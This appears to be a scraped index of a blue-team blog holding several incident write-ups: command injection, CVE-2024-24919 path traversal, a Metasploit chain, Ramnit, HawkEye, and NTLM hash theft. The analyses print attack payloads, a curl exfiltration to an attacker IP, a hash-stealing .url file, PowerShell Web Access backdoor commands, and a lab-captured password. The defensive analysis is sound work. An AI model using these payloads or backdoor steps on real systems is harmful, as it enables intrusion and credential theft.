# The last observed request from 61.177.172.87 was at 04:15 AM on Feb 28, 2022. No further entries appeared in the log window beyond that timestamp. The IP was blocked at the perimeter firewall to prevent any follow-up connection attempts.\nIs the vulnerable endpoint still exposed? # The /video/ endpoint on 172.16.17.16 was passing the ?c= parameter directly to the system shell with no sanitization or allowlist enforcement. The endpoint was taken offline pending a code-level fix. Input validation restricting the ?c= parameter to expected values was flagged as mandatory before redeployment.\nActions taken # 61.177.172.87 was blocked at the perimeter firewall. 172.16.17.16 was isolated from external access and escalated to Tier 2 for credential rotation on all accounts present in the dumped /etc/passwd and /etc/shadow files.\nIOCs # IPs\n- 61.177.172.87 - attacker IP\nHosts\n- 172.16.17.16 (WebServer1004) - compromised web server\nRequests\n- ?c=ls\n- ?c=whoami\n- ?c=uname\n- ?c=cat /etc/passwd\n- ?c=cat /etc/shadow\nUser-Agents\n- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - spoofed legacy User-Agent used across all requests\n","date":"April 2, 2026","externalUrl":null,"permalink":"/blue_team/ld-whoami-command-detected-in-request-body/","section":"","summary":"An external attacker from a CHINANET-hosted IP (61.177.172.87) exploited a command injection vulnerability on WebServer1004, executing five OS commands via the ?c= parameter against /video/ - including cat /etc/passwd and cat /etc/shadow - all of which returned HTTP 200 with distinct response sizes, confirming successful remote code execution. 
The case was escalated to Tier 2.","title":"LD-Whoami Command Detected in Request Body","type":"blue_team"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/lfi/","section":"Tags","summary":"","title":"LFI","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/no-escalation/","section":"Tags","summary":"","title":"No Escalation","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/path-traversal/","section":"Tags","summary":"","title":"Path Traversal","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/rce/","section":"Tags","summary":"","title":"RCE","type":"tags"},{"content":"","date":"April 2, 2026","externalUrl":null,"permalink":"/tags/xss/","section":"Tags","summary":"","title":"XSS","type":"tags"},{"content":" TL;DR # A phishing document delivered via download triggered a multi-stage infection chain on host 192.168.10.15 (HD-FIN-03). The malicious Word document important_instructions.docx dropped FSETPBEUsIek.exe, which spawned cmd.exe, wrote and executed a VBS script, used cscript.exe to drop a secondary executable, and injected a thread into notepad.exe. The attacker established persistence via a registry Run key pointing to a VBS file in C:\\Windows\\TEMP. A second compromised host 192.168.10.29 later exfiltrated sami.xlsx to the attacker IP 192.20.80.25 via HTTP PUT. Suricata detected Metasploit metsrv.x86.dll payloads in traffic to both victim hosts.\nInitial Triage # The investigation started with a broad overview of all events in IBM QRadar - a SIEM platform that aggregates logs from multiple sources, correlates them into offenses, and assigns magnitude scores based on severity and relevance. 
I began by examining the Top 10 Event Name Results by Count to understand the distribution of event types across the timeframe.\nTo focus on the most critical events, I filtered by Magnitude to surface the highest-severity correlated events.\nThe filtered view surfaced NIDS Alerts from SO-Suricata with the highest magnitude scores, alongside Module Logging Command Invocation, PowerShell Console events, and a QRadar custom rule hit for Exploit Followed by Suspicious Host Activity - Chained. I started with the Suricata alerts as they indicated active network-level exploitation.\nReviewing the connections view confirmed three victim IPs communicating with the attacker 192.20.80.25, among them 192.168.10.29, and revealed a second Suricata hit on Nov 9, 2020 targeting 192.168.20.20 (DC) - suggesting the attacker pivoted after the initial compromise.\nInitial Access # The Suricata NIDS alert at Nov 8, 2020, 22:30:49 triggered on traffic between 192.20.80.25 (attacker) and 192.168.10.15 (patient zero, HD-FIN-03):\nET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)\nCategory: A Network Trojan was detected\nExamining the payload, the UTF view revealed metsrv.x86.dll and ReflectiveLoader strings - confirming this is a Metasploit Meterpreter reverse shell payload delivered as a reflectively-loaded DLL.\nExecution Chain # Pivoting to process creation events on 192.168.10.15 and sorting chronologically revealed the full execution chain. At 22:30:03 WINWORD.EXE launched with the following command:\n\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\" /n \"C:\\Users\\nour.HACKDEFEND\\Downloads\\important_instructions.docx\" /o \"\"\nThe user nour opened important_instructions.docx (MD5: 9D08221599FCD9D35D11F9CBD6A0DEA3) from the Downloads folder. The /o \"\" flag suppresses the splash screen, consistent with a document that auto-executes a macro on open. 
At 22:30:51 - 48 seconds after Word launched - a new process was created directly in the user's profile directory:\nC:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe\nMD5: 6F37EB2B7F6720B48588FB2B84ED17C8\nThe random-looking name FSETPBEUsIek.exe dropped directly into the user's home folder is a strong indicator of a VBA macro dropper - Word macros commonly write and execute payloads to the current user's directory without requiring elevated privileges.\nAt 22:32:37 FSETPBEUsIek.exe spawned cmd.exe:\nC:\\Windows\\system32\\cmd.exe\nCurrentDirectory: C:\\Users\\nour.HACKDEFEND\\\nUser: HACKDEFEND\\nour\nAt 22:35:04 the executable wrote and executed a VBS script:\nFSETPBEUsIek.exe → C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\uCOadJlMb.vbs\nAt 22:35:17 cscript.exe executed the VBS script, which in turn dropped a secondary executable:\nC:\\Windows\\SysWOW64\\cscript.exe\nTargetFilename: C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\radD54BD.tmp\\FaFRuwJIlNvBNaT.exe\nProcess Injection and Privilege Escalation # At 22:35:37 a CreateRemoteThread event was logged - one process injecting a thread into another process, which is the primary mechanism used by Meterpreter to migrate into a less suspicious host process:\nSource: C:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe\nTarget: C:\\Windows\\SysWOW64\\notepad.exe\nBy injecting into notepad.exe, the malware migrated its execution context into a trusted Windows process. 
At 22:35:46 - nine seconds after the injection - a Success Audit: An account was successfully logged on event fired with AccountName: SYSTEM, confirming the injected code successfully escalated privileges to SYSTEM.\nLateral Movement and Persistence # On Nov 9, 2020, 09:51:45 Suricata fired a second Metasploit payload alert - this time with source 192.20.80.25 and destination 192.168.20.20 (the Domain Controller), confirming the attacker pivoted laterally from HD-FIN-03 to the DC.\nShortly after, at 09:53:39, a Sysmon RegistryEvent (Value Set) (Event ID 13) was logged on the DC:\nImage: C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe\nTarget Object: HKU\\DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SsGHOMcjsj\nTarget Details: C:\\Windows\\TEMP\\PjvQTe.vbs\nThe attacker used PowerShell to write a VBS file path into the Software\\Microsoft\\Windows\\CurrentVersion\\Run key under the HKU\\DEFAULT user hive.\nExfiltration # Filtering events for the second victim host 192.168.10.29 and the attacker IP revealed a Suricata alert at Nov 9, 2020, 10:29:52:\nET INFO Dotted Quad Host XLSX Request\nET POLICY curl User-Agent Outbound\nExamining the payload of the associated HTTP connection confirmed active exfiltration:\nPUT /sami.xlsx\nHost: 192.20.80.25\nUser-Agent: curl/7.55.1\nContent-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\nrequest_body_len: 43062\nThe attacker used curl to upload sami.xlsx (43 KB) via HTTP PUT directly to their server at 192.20.80.25. 
The curl User-Agent and dotted-quad host in a spreadsheet request are both highly anomalous and were correctly flagged by Suricata.\nIOCs # IPs\n- 192.20.80.25 - attacker IP and Metasploit C2 server\n- 192.168.10.15 - patient zero (HD-FIN-03, user nour)\n- 192.168.10.29 - second compromised host (exfiltration source)\n- 192.168.20.20 - Domain Controller (lateral movement target, persistence established)\nFiles\n- important_instructions.docx - MD5:9D08221599FCD9D35D11F9CBD6A0DEA3\n- C:\\Users\\nour.HACKDEFEND\\FSETPBEUsIek.exe - MD5:6F37EB2B7F6720B48588FB2B84ED17C8\n- C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\uCOadJlMb.vbs - VBS dropper\n- C:\\Users\\NOUR~1.HAC\\AppData\\Local\\Temp\\radD54BD.tmp\\FaFRuwJIlNvBNaT.exe - secondary payload\n- C:\\Windows\\TEMP\\PjvQTe.vbs - persistence VBS script\n- sami.xlsx - exfiltrated file\nRegistry\n- HKU\\DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SsGHOMcjsj - persistence key\nAccounts\n- HACKDEFEND\\nour - compromised user account\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([nour - 192.168.10.15HD-FIN-03]):::start --\u003e B[Nov 8 22:30:03 - WINWORD.EXE openedimportant_instructions.docxMD5: 9D08221599FCD9D35D11F9CBD6A0DEA3]:::access B --\u003e C[Nov 8 22:30:51 
- VBA macro dropsFSETPBEUsIek.exeMD5: 6F37EB2B7F6720B48588FB2B84ED17C8]:::exec C --\u003e D[Nov 8 22:32:37 - cmd.exe spawned]:::exec C --\u003e E[Nov 8 22:35:04 - VBS writtenuCOadJlMb.vbs]:::exec E --\u003e F[Nov 8 22:35:17 - cscript.exe dropsFaFRuwJIlNvBNaT.exe]:::exec subgraph Injection [Injection and Escalation] F --\u003e G[Nov 8 22:35:37 - CreateRemoteThreadinject into notepad.exe]:::inject G --\u003e H[Nov 8 22:35:46 - SYSTEM logon confirmed]:::inject H --\u003e I[Nov 8 22:30:49 - Suricatametsrv.x86.dll detected192.20.80.25 to 192.168.10.15]:::c2 end subgraph Lateral [Lateral Movement and Persistence] I --\u003e J[Nov 9 09:51:45 - SuricataMetasploit payload192.20.80.25 to DC 192.168.20.20]:::persist J --\u003e K[Nov 9 09:53:39 - Registry Run keyHKU\\DEFAULT\\...\\Run\\SsGHOMcjsjC:\\Windows\\TEMP\\PjvQTe.vbs]:::persist end subgraph Exfil [Exfiltration] K --\u003e L[Nov 9 10:29:52 - curl PUT /sami.xlsx192.168.10.29 to 192.20.80.2543062 bytes]:::exfil end ","date":"April 1, 2026","externalUrl":null,"permalink":"/blue_team/cdef-qradar101/","section":"","summary":"A user opened a malicious Word document that dropped FSETPBEUsIek.exe, which spawned a VBS script, injected into notepad.exe, established persistence via registry Run key, exfiltrated sami.xlsx to an attacker-controlled server, and triggered a Metasploit reverse shell detected by Suricata.","title":"CDEF-Qradar101","type":"blue_team"},{"content":"","date":"April 1, 2026","externalUrl":null,"permalink":"/tags/qradar/","section":"Tags","summary":"","title":"Qradar","type":"tags"},{"content":"","date":"March 31, 2026","externalUrl":null,"permalink":"/tags/cve-2024-24919/","section":"Tags","summary":"","title":"CVE-2024-24919","type":"tags"},{"content":" Alert # EventID: 263\nSeverity: High\nEvent Time: Jun, 06, 2024, 03:12 PM\nRule: SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]\nLevel: Security Analyst\nHostname: CP-Spark-Gateway-01\nDestination IP Address: 172.16.20.146 
Source IP Address: 203.160.68.12\nHTTP Request Method: POST\nRequested URL: 172.16.20.146/clients/MyCRL\nRequest: aCSHELL/../../../../../../../../../../etc/passwd\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\nAlert Trigger Reason: Characteristics exploit pattern Detected on Request, indicative exploitation of the CVE-2024-24919.\nDevice Action: Allowed\nCVE-2024-24919 # CVE-2024-24919 is a path traversal vulnerability in Check Point Security Gateway. It allows an unauthenticated attacker to read arbitrary files from the filesystem by sending a crafted POST request to the /clients/MyCRL endpoint with a path traversal sequence prefixed by aCSHELL/. The vulnerability was actively exploited in the wild shortly after disclosure, with attackers primarily targeting /etc/passwd and /etc/shadow to extract credentials for VPN accounts.\nIdentification # Is the traffic coming from outside? # The source IP 203.160.68.12 is an external address originating outside the corporate network. Traffic direction is Internet to Company Network. This was confirmed not to be a planned penetration test.\nIs the source malicious? # I checked 203.160.68.12 on AbuseIPDB - the IP belongs to China Unicom (Hong Kong) Operations Limited. It has been reported 2 times with 0% Confidence of Abuse. VirusTotal flagged the IP as malicious by 2/94 vendors - Forcepoint ThreatSeeker and Webroot both classify it as malicious, with alphaMountain.ai rating it suspicious.\nWhat type of attack was attempted? # The alert triggered on a POST request to /clients/MyCRL with the body aCSHELL/../../../../../../../../../../etc/passwd - a textbook CVE-2024-24919 exploitation attempt. The aCSHELL/ prefix is required by the vulnerable endpoint's parsing logic, after which the path traversal sequence ../../../../../../../../../../ climbs to the filesystem root and reads /etc/passwd. 
This file contains the list of all system accounts and is the primary target for initial credential harvesting on Unix-based systems.\nDid anyone else get targeted? # Reviewing the firewall logs and access log, I identified a second attacker IP - 203.160.68.13 - in the same /19 subnet as the primary attacker. At 15:14:02 this IP submitted an identical exploit request targeting /etc/shadow, which stores hashed passwords. This request returned HTTP 403 and was blocked.\nThe coordinated use of two IPs from the same subnet within two minutes suggests a single threat actor using multiple egress points.\nDid the attack succeed? # Yes. The access log confirms the initial request from 203.160.68.12 at 15:12:45 returned HTTP 200 with a response size of 1256 bytes - larger than a typical error response, indicating the server returned the contents of /etc/passwd. The subsequent POST to / at 15:15:01 also returned HTTP 200, suggesting the attacker sent a follow-up request after the successful file read.\n203.160.68.12 \"POST /clients/MyCRL HTTP/1.1\" 200 1256 \"aCSHELL/../../../../../../../../../../etc/passwd\"\n203.160.68.13 \"POST /clients/MyCRL HTTP/1.1\" 403 314 \"aCSHELL/../../../../../../../../../../etc/shadow\"\n203.160.68.12 \"POST / HTTP/1.1\" 200 512\nTriage Decision # What is the impact level? # The attacker successfully read /etc/passwd from the Check Point Security Gateway 172.16.20.146, obtaining the full list of system and VPN accounts. A second attacker IP from the same subnet attempted to read /etc/shadow but was blocked. The gateway is a network security device - credential exposure at this level could enable VPN account compromise and lateral movement into the internal network. Escalated to Tier 2.\nContainment # Is the attacker still active? # The last observed request from the attacker IPs was at 15:15:01. 
The OS log entry at 15:30 shows a local loopback event on 172.16.20.146 with no associated external traffic, so no active attacker connection was present at that time. Both IPs 203.160.68.12 and 203.160.68.13 were blocked at the perimeter firewall.\nIs the vulnerable endpoint still exposed? # The /clients/MyCRL endpoint on 172.16.20.146 remains vulnerable until the Check Point hotfix for CVE-2024-24919 is applied. The gateway was isolated from external access pending patching and the case was escalated to Tier 2 for credential rotation on all accounts present in the dumped /etc/passwd file.\nIOCs # IPs\n- 203.160.68.12 - primary attacker IP\n- 203.160.68.13 - secondary attacker IP\nEndpoints\n- 172.16.20.146 (CP-Spark-Gateway-01) - compromised Check Point Security Gateway\nRequests\n- aCSHELL/../../../../../../../../../../etc/passwd - successful file read payload\n- aCSHELL/../../../../../../../../../../etc/shadow - blocked file read attempt\n","date":"March 31, 2026","externalUrl":null,"permalink":"/blue_team/ld-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919/","section":"","summary":"An attacker exploited CVE-2024-24919 against a Check Point Security Gateway, successfully reading /etc/passwd via a path traversal payload. A second request targeting /etc/shadow from a related IP was blocked. The attack succeeded and the endpoint was escalated to Tier 2.","title":"LD-Arbitrary File Read on Checkpoint Security Gateway (CVE-2024-24919)","type":"blue_team"},{"content":" Difficulty: Easy OS: Windows Date: 2026-03-30 TL;DR # A Windows memory image was provided for analysis. Process enumeration revealed a suspicious ChromeSetup.exe process spawned under explorer.exe, indicating direct user-context execution rather than a legitimate installer flow. Network scan output showed ChromeSetup.exe initiating an outbound connection to 58.64.204.181:5202 in Hong Kong. 
The process was dumped from memory and submitted to VirusTotal, where it was flagged by 68/72 vendors as Ramnit - a worm and credential-stealing trojan.\nProcess Analysis # I started by running windows.pslist against the memory image using Volatility 3.\nThe process list showed ChromeSetup.exe (PID 4628) as a child of explorer.exe (PID 4568).\nNetwork Analysis # With a suspicious process identified, I ran windows.netscan to enumerate active and recently closed network connections and correlate them with running processes.\nChromeSetup.exe had an active outbound connection in state SYN_SENT to 58.64.204.181:5202 at 19:48:51 UTC - one second after the process started. SYN_SENT means the TCP handshake was initiated but not yet completed at the moment of memory capture, indicating the malware was actively attempting to reach its C2 server. Port 5202 is non-standard and has no legitimate association with Chrome.\nI checked the destination IP - 58.64.204.181 resolves to NWT IDC Data Service, Hong Kong. There is no legitimate reason for a Chrome installer to connect to a Hong Kong data center IP on a non-standard port.\nFile Extraction and Identification # With the process confirmed as suspicious through both process tree anomalies and network behavior, I dumped the executable from memory using windows.dumpfiles targeting PID 4628.\nThe dumped file file.0xca82b85325a0.0xca82b7e06c80.ImageSectionObject.ChromeSetup.exe.img was submitted to VirusTotal by MD5 hash 11318cc3a3613fb679e25973a0a701fc.\n68 out of 72 vendors flagged the file as malicious. The popular threat label is virus.nimnul/vjadtre, with family labels including nimnul, vjadtre, and wapomi. Threat categories are listed as virus and trojan. 
VirusTotal behavior tags include persistence, spreader, checks-network-adapters, and detect-debug-environment - consistent with Ramnit's known behavior of infecting executables on the local filesystem, spreading via removable drives, and establishing persistent C2 communication.\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef c2 fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([Userexplorer.exe PID 4568]):::start --\u003e B[2024-02-01 19:48:50 UTCChromeSetup.exe launchedPID 4628 - 32-bit - Wow64]:::action B --\u003e C[2024-02-01 19:48:51 UTCSYN_SENT to 58.64.204.181:5202NWT IDC Data Service - Hong Kong]:::c2 C --\u003e D([Ramnit C2 beaconvirus.nimnul/vjadtre68/72 VirusTotal vendors]):::c2\nIOCs # IPs\n- 58.64.204.181 - Ramnit C2 server (Hong Kong, port 5202)\nFiles\n- ChromeSetup.exe - Ramnit worm masquerading as Chrome installer\n- MD5: 11318cc3a3613fb679e25973a0a701fc\n- SHA256: 1ac890f5fa78c857de42a112983357b0892537b73223d7ec1e1f43f8fc6b7496\nProcesses\n- PID 4628 ChromeSetup.exe - malicious process under explorer.exe PID 4568\nPorts\n- 5202/TCP - non-standard C2 communication port\n","date":"March 30, 2026","externalUrl":null,"permalink":"/investigations/cdef-ramnit/","section":"","summary":"Memory forensics of a compromised Windows host revealed ChromeSetup.exe spawned under explorer.exe, establishing a C2 connection to a Hong Kong-based IP. 
The dumped binary was identified as the Ramnit worm - flagged by 68/72 VirusTotal vendors.","title":"CDEF-Ramnit","type":"investigations"},{"content":"","date":"March 30, 2026","externalUrl":null,"permalink":"/tags/endpoint-forensic/","section":"Tags","summary":"","title":"Endpoint Forensic","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-18 TL;DR # A victim host at 10.4.10.132 downloaded a malicious executable via HTTP from an OVH-hosted server in France. The file was a HawkEye Keylogger - Reborn v9 dropper, detected by 58 out of 72 vendors on VirusTotal. After execution, the malware periodically beaconed to bot.whatismyipaddress.com to retrieve the victim's external IP, and exfiltrated harvested credentials every 10 minutes via SMTP to an attacker-controlled inbox at macwinlogistics.in.\nInitial Analysis # The capture contains 4003 frames. TCP dominates at 93.3% of packets. Two protocols stood out as relevant to an investigation — HTTP (0.4% of packets but 84.8% of bytes, indicating a large file transfer) and SMTP (3.7% of packets, suggesting email activity). I decided to start with HTTP since the large byte ratio suggested a file download.\nMalware Download # I found a GET request from the victim 10.4.10.132 to 217.182.138.150:\nGET /proforma/tkraw_Protected99.exe HTTP/1.1\nThe server responded with HTTP/1.1 200 OK and Content-Type: application/x-msdownload, confirming a successful executable download.\nI looked up the source IP 217.182.138.150 on AbuseIPDB - it was not found in their database, but the IP belongs to OVH SAS, a French hosting provider, located in Dunkerque, France. Attacker infrastructure hosted on VPS/hosting providers like OVH is common for malware distribution.\nI then submitted the file hash to VirusTotal:\nMD5: 71826ba081e303866ce2a2534491a2f7\nFile: tkraw_Protected99.exe (1.93 MB)\n58 out of 72 security vendors flagged it as malicious. 
The popular threat label is trojan.autoit/gen8, with family labels including hawkeye - confirming this is a HawkEye Keylogger dropper packed with AutoIt. VirusTotal behavior tags include persistence, clipboard, checks-network-adapters, detect-debug-environment and long-sleeps - consistent with a keylogger.\nBeaconing Behavior # After the download, filtering HTTP traffic revealed a recurring pattern - every 10 minutes, 10.4.10.132 sent a GET / request to 66.171.248.178.\nGET / HTTP/1.1\nHost: bot.whatismyipaddress.com\nConnection: Keep-Alive\nThe server responded with the victim's external IP address - 173.66.146.112. This is a common technique used by malware to determine the public IP of the infected machine before exfiltration, allowing the attacker to correlate the victim's identity.\nData Exfiltration # Switching focus to SMTP traffic, I followed the TCP streams on port 25 connections going to 23.229.162.69. The captured SMTP session revealed the attacker's exfiltration channel:\nFrom: sales.del@macwinlogistics.in\nTo: sales.del@macwinlogistics.in\nContent-Transfer-Encoding: base64\nThe credentials used to authenticate to the SMTP server: Sales@23. The email body was base64-encoded - after decoding, the content confirmed the malware identity and revealed stolen credentials:\nHawkEye Keylogger - Reborn v9\nPasswords Logs\nroman.mcguire \\ BEIJING-5CD1-PC\n\nURL : https://login.aol.com/account/challenge/password\nWeb Browser : Internet Explorer 7.0 - 9.0\nUser Name : roman.mcguire914@aol.com\nPassword : P@ssw0rd$\nPassword Strength : Very Strong\n... 
The malware exfiltrated keylogger output - including saved browser credentials - every 10 minutes, sending them to the attacker-controlled inbox sales.del@macwinlogistics.in.\nIOCs # IPs\n- 217.182.138.150 — malware distribution server (OVH SAS, France)\n- 66.171.248.178 — bot.whatismyipaddress.com — IP beacon target\n- 23.229.162.69 — SMTP exfiltration server\nFiles\n- tkraw_Protected99.exe — HawkEye Keylogger Reborn v9 dropper\n- MD5: 71826ba081e303866ce2a2534491a2f7\n- SHA256: 62099532750dad1054b127689680c38590033fa0bdfa4fb40c7b4dcb2607fb11\nAccounts\n- sales.del@macwinlogistics.in — attacker SMTP inbox\n- roman.mcguire914@aol.com — stolen credential\nCredentials\n- SMTP password: Sales@23\n- Stolen AOL password: P@ssw0rd$\nRecommendations # Immediate Actions\n- Isolate host 10.4.10.132 from the network\n- Block IP 217.182.138.150 and domain macwinlogistics.in at the perimeter\n- Reset all credentials for user roman.mcguire across all services\n- Scan all hosts on the 10.4.10.0/24 subnet for the same IOCs\nPreventive Measures\n- Deploy email filtering to block outbound SMTP to unauthorized servers\n- Block outbound connections to IP-lookup services like bot.whatismyipaddress.com\n- Enable EDR to detect AutoIt-based droppers at execution time\n- Restrict executable downloads via web proxy - block application/x-msdownload from unknown hosts\n- Enable MFA on all user email accounts to limit impact of stolen credentials\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef persist 
fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([10.4.10.132Victim Host]):::start --\u003e B[2019-04-10 20:37:54HTTP GET tkraw_Protected99.exefrom 217.182.138.150]:::access B --\u003e C[2019-04-10 20:38:15File downloadedapplication/x-msdownload]:::action subgraph Beaconing [Beaconing — every 10 minutes] C --\u003e D[GET bot.whatismyipaddress.comReturns external IP 173.66.146.112]:::persist end subgraph Exfiltration [Exfiltration — every 10 minutes] D --\u003e E[SMTP to 23.229.162.69sales.del@macwinlogistics.inBase64-encoded credentials]:::exfil E --\u003e F([HawkEye Keylogger Reborn v9Stolen: roman.mcguire914@aol.comP@ssw0rd$]):::exfil end ","date":"March 25, 2026","externalUrl":null,"permalink":"/investigations/cdef-hawkeye/","section":"","summary":"A victim host downloaded a HawkEye Keylogger dropper via HTTP, which established persistence, periodically checked the external IP via bot.whatismyipaddress.com, and exfiltrated harvested credentials every 10 minutes over SMTP.","title":"CDEF-HawkEye","type":"investigations"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/event-viewer/","section":"Tags","summary":"","title":"Event Viewer","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-25 TL;DR # The threat actor compromised a Windows server by performing a password spraying attack against domain accounts, then planted a malicious Internet Shortcut file (Proposal.url) in a network share to steal the NetNTLM hash of user k.texus via a forced SMB authentication. 
Using the captured hash, the attacker authenticated via Pass-the-Hash, established an RDP session, exfiltrated sensitive project files (C:\\ProjectArk) as a ZIP archive to C2 server yourc2filemanager.cn, and installed Windows PowerShell Web Access as a persistent backdoor with a newly created local account t.minami.\nInitial Access # The attacker at 6/11/2025 14:35:56 performed a password spraying attack. Password Spraying Attack # Password spraying is a type of brute force attack where an attacker tries a single common password against many different accounts to avoid triggering lockout policies that would occur when brute forcing a single account with many passwords.\nFollowing the 4625 events, I found a corresponding Event ID 4624 with Type 3 (which means connection through network) - at 2025-06-11 14:35:56 the attacker successfully logged into the v.hunter account from 192.168.189.129.\nShared Folder # The attacker accessed a shared folder \u0026ldquo;Proposal\u0026rdquo; configured with Full Control permissions granted to Everyone. The folder is located at:\nC:\\Users\\k.texus\\Desktop\\Project Proposal\nThis shared folder was last modified at 2025-06-11 14:39:20 and contains two files.\nnewproposal.txt contains a phishing message with an email address pointing to the @project.ark domain:\n1Greeting project manager! your contractor here! I have made a new proposal 2for our project and you can click another file on this folder to go directly 3to my private website! If you have any question regarding this proposal, 4please send it to argonaut@project.ark NTLM Hash Stealing # The second file, Proposal.url, is a malicious Internet Shortcut crafted for NetNTLM hash theft:\n1[InternetShortcut] 2URL=http://argonaut.ark/proposal.html 3WorkingDirectory=C:\\Users\\ 4IconFile=\\\\192.168.189.129\\%USERNAME%.icon 5IconIndex=1 This file does not require the victim to execute it. 
The attack triggers automatically when a user opens the \u0026ldquo;Proposal\u0026rdquo; folder in Windows Explorer. The IconFile parameter forces Windows to fetch the icon from the attacker\u0026rsquo;s SMB share at \\\\192.168.189.129. During this request, Windows automatically performs NTLM authentication and transmits the victim\u0026rsquo;s NetNTLM hash to the attacker\u0026rsquo;s server. The use of %USERNAME% in the path allows the attacker to identify exactly which account\u0026rsquo;s credentials were captured.\nAt 2025-06-11 14:41:38 the user k.texus opened the folder, triggering the hash leak.\nAt 2025-06-11 14:42:57 the attacker authenticated as k.texus using the captured NTLM hash (Pass-the-Hash).\nAt 2025-06-11 14:44:48 the attacker connected via RDP using the compromised account.\nExfiltration # To understand what the attacker did during the RDP session, I analyzed the Microsoft Edge browser history of k.texus using a SQLite viewer on the History database file. The urls table revealed the attacker\u0026rsquo;s activity chronologically:\nThe attacker searched for and visited 7-zip.org to download the archiving tool, then accessed http://localhost/ - the ProjectArk web application running locally on the server. After that, the browser history shows visits to http://yourc2filemanager.cn/ and http://yourc2filemanager.cn/upload.php, confirming the upload of the exfiltrated archive to the C2 server.\nTo confirm what was archived and when, I used MFTECmd to parse the NTFS $J journal, which logs all file system operations. Filtering by the C:\\ProjectArk path revealed:\nAt 2025-06-11 14:46:42 the attacker created arkproj.zip containing the contents of C:\\ProjectArk. The total size of exfiltrated files was 783,907 bytes. At 2025-06-11 14:46:44 the archive was exfiltrated to the C2 server yourc2filemanager.cn.\nBackdoor Installation # To find post-exfiltration activity, I examined the PowerShell event logs Windows PowerShell.evtx - in Event Viewer. 
However, the most direct evidence came from ConsoleHost_history.txt of user k.texus which stores a history of all PowerShell commands entered interactively. The file revealed the full sequence of commands executed by the attacker:\n1Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementTools 2Install-PswaWebApplication -UseTestCertificate 3Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName * 4Enable-PSRemoting -Force 5Test-WSMan 6Get-Service -Name WinRM 7net localgroup \u0026#34;remote management users\u0026#34; t.minami /add 8net user t.minami After exfiltration, the attacker installed Windows PowerShell Web Access (PSWA) as a web-based backdoor to maintain persistent access to the server. PSWA provides a browser-based interface for executing PowerShell commands remotely over the WinRM protocol. The rule Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName * grants unrestricted access - any user can connect to any host with any configuration.\nPersistence # To maintain persistence, the attacker created a local user t.minami and added it to the Remote Management Users group, enabling WinRM/PSWA authentication independently of the compromised accounts.\nTo confirm that the backdoor was actually used, I examined the IIS logs located at \\inetpub\\logs\\LogFiles\\W3SVC1. IIS is the Windows web server that hosts the PSWA web interface - it logs every HTTP request made to it, including the authenticated username, source IP, HTTP method, and response code. The logs confirmed a successful login and session establishment at 2025-06-11 14:54:55:\n12025-06-11 14:54:55 POST /pswa/en-US/logon.aspx ... 192.168.189.129 ... 302 0 0 5389 22025-06-11 14:54:55 GET /pswa/ ... LIBERYSV08\\t.minami 192.168.189.129 ... 302 